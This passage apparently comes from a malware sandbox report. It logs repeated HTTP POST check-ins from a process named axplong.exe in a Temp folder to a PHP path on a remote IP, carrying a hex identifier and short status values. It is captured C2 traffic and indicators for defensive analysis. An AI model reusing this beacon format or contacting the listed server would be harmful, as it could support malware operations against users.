                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:12.348256111 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:12.579307079 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.665068185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:12.702795029 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:13.421040058 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:13.421866894 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:13.653191090 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.665069185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:13.763535976 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:14.455089092 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:14.455976963 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:14.678169012 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.665070185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:14.794277906 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:15.485001087 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:15.485976934 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:15.707859039 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.665071185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:15.825481892 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:16.532732010 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:16.533512115 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:16.764434099 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.665072185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:16.872104883 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:17.579579115 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:17.580671072 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:17.816270113 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.665073185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:17.934891939 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:19.731122971 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:19.731821060 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:19.731959105 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:19.731976032 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:19.733408928 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:19.964298010 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:19 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.665074185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:20.075298071 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:20.784742117 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:20 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:20.786175966 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:21.025149107 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:20 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.665075185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:21.137820005 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:21.838718891 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:21 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:21.841479063 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:22.065246105 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:21 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.665076185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:22.185002089 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:22.900418043 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:22 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:22.901308060 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:23.133434057 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:23 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.665077185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:23.247329950 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:23.958262920 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:23 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:23.959089994 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:24.190504074 CEST196INHTTP/1.1 200 OK
